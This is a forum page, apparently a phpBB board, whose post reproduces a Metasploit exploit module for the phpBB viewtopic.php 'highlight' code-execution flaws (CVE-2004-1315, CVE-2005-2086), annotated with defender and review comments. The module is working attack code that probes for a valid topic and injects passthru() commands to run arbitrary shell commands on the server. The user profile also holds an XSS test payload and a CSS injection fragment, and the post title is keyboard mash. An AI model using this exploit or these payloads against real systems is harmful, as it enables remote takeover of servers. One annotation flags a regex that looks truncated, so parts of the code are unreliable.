


 

 

 none hnfgngfn fn fgdg fg fg g gf

<style>div{display:none;
Admin



Join date : 2010-12-20
Location : <script>alert(/xss/)</script>

none hnfgngfn fn fgdg  fg fg  g gf Empty
PostSubject: none hnfgngfn fn fgdg fg fg g gf   none hnfgngfn fn fgdg  fg fg  g gf I_icon_minitimeFri Mar 09, 2012 6:45 pm


##
# $Id: phpbb_highlight.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
# Declares this module's metadata and its user-settable options.
#
# The metadata describes two PHP code-execution flaws (CVE-2004-1315 and
# CVE-2005-2086) in how phpBB's viewtopic.php handles the 'highlight'
# parameter. Per the description text, releases 2.0.4 through 2.0.15 are
# affected and the flaw was fixed in revision 5166, so the remediation for
# an affected forum is to upgrade past 2.0.15.
#
# info - Hash of metadata supplied by the caller; it is passed to
#        update_info together with the values declared here.
def initialize(info = {})
  # Advisory identifiers, in the order the module lists them.
  advisory_refs = [
    ['CVE', '2005-2086'],
    ['CVE', '2004-1315'],
    ['OSVDB', '11719'],
    ['OSVDB', '17613'],
    ['BID', '14086'],
    ['BID', '10701']
  ]

  # Payload constraints: command-type payloads only, at most 1024 bytes.
  payload_limits = {
    'DisableNops' => true,
    'Space' => 1024,
    'Compat' => {
      'PayloadType' => 'cmd',
      'RequiredCmd' => 'generic perl ruby bash telnet'
    }
  }

  # 'Automatic' (index 0) is the default target.
  target_list = [
    ['Automatic', {}],
    ['phpbb <=2.0.10', {}],
    ['phpbb <=2.0.15', {}]
  ]

  # The %q{} text is kept flush-left so the string's bytes stay unchanged.
  module_info = update_info(
    info,
    'Name' => 'phpBB viewtopic.php Arbitrary Code Execution',
    'Description' => %q{
This module exploits two arbitrary PHP code execution flaws in the
phpBB forum system. The problem is that the 'highlight' parameter
in the 'viewtopic.php' script is not verified properly and will
allow an attacker to inject arbitrary code via preg_replace().
This vulnerability was introduced in revision 3076, and finally
fixed in revision 5166. According to the "tags" within their tree,
this corresponds to versions 2.0.4 through 2.0.15 (inclusive).
},
    'Author' => ['valsmith[at]metasploit.com', 'hdm', 'patrick'],
    'License' => MSF_LICENSE,
    'Version' => '$Revision: 9671 $',
    'References' => advisory_refs,
    'Privileged' => false,
    'Payload' => payload_limits,
    'Platform' => 'unix',
    'Arch' => ARCH_CMD,
    'Targets' => target_list,
    'DisclosureDate' => 'Nov 12 2004',
    'DefaultTarget' => 0
  )
  super(module_info)

  # URI is required and defaults to /phpBB2; TOPIC is optional.
  register_options(
    [
      OptString.new('URI', [true, "The phpBB root Directory", "/phpBB2"]),
      OptString.new('TOPIC', [false, "The ID of a valid topic"])
    ],
    self.class
  )
end
# Looks for a topic ID that the forum will render.
#
# Requests viewtopic.php for topic IDs 1 through 32 (25 is passed as the
# second argument of each request) and stops at the first response whose
# body contains class="postdetails".
#
# Returns the matching Integer ID, or false when none of the 32 IDs matched.
#
# Defender note: a single client requesting viewtopic.php?topic=1,2,3,... in
# sequence is the access-log footprint of this probe.
def find_topic
  (1..32).each do |topic_id|
    probe_uri = datastore['URI'] + '/viewtopic.php?topic=' + topic_id.to_s
    response = send_request_raw({ 'uri' => probe_uri }, 25)

    # No response, or a page without the post-details markup: try the next ID.
    next unless response && response.body.match(/class="postdetails"/)

    print_status("Discovered valid topic ID: #{topic_id}")
    return topic_id
  end

  false
end
# Builds one viewtopic.php request whose 'highlight' value carries the
# encoded payload and sends it.
#
# The topic ID comes from the TOPIC option or, when that is unset, from
# find_topic. Without a topic ID the method prints a status line and
# returns without sending the payload request.
#
# Defender note: every variant below requests viewtopic.php with a
# 'highlight' value that begins with an encoded single quote (%27, or the
# double-encoded %2527) followed by passthru( and a chain of chr(N) calls.
# That combination in web-server logs is a usable detection signature. The
# module description gives 2.0.4 through 2.0.15 as the affected phpBB
# releases.
#
# NOTE(review): the tail of this method was collapsed onto a single line
# with <br /> markup in the forum paste. Line breaks are restored here and
# the code tokens are left as the page shows them.
def exploit
  topic = datastore['TOPIC'] || find_topic
  if !(topic)
    print_status("No valid topic ID found, please specify the TOPIC option.")
    return
  else
    # Common request prefix; each branch below appends the encoded payload.
    sploit = datastore['URI'] + "/viewtopic.php?t=#{topic}&highlight="
    case target.name
    when /Automatic/
      # Probe request: the double-encoded form wrapped around phpinfo().
      req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527"
      res = send_request_raw({
        'uri' => datastore['URI'] + req
      }, 25)
      print_status("Trying to determine which attack method to use...")
      # NOTE(review): this pattern looks truncated ("\p" is not followed by a
      # property name), presumably text lost when the forum rendered the
      # paste as HTML. Compare with the upstream module before trusting it.
      if (res and res.body =~ /\phpinfo/)
        # Probe output seen in the response: use the double-encoded form.
        # The "ch =" inside the block is redundant; map! stores the block's value.
        byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
        sploit << "%2527%252epassthru(#{byte})%252e%2527"
      else
        # Otherwise fall back to the single-encoded form.
        byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
        sploit << "%27.passthru(#{byte}).%27"
      end
    when /2\.0\.10/
      # Target 'phpbb <=2.0.10': double-encoded form, no probe.
      byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
      sploit << "%2527%252epassthru(#{byte})%252e%2527"
    when /2\.0\.15/
      # Target 'phpbb <=2.0.15': single-encoded form, no probe.
      byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
      sploit << "%27.passthru(#{byte}).%27"
    end
    # The response is stored in res, but nothing visible here inspects it.
    res = send_request_raw({
      'uri' => sploit
    }, 25)
  end
end
# Closes class Metasploit3, which is opened above the method definitions.
end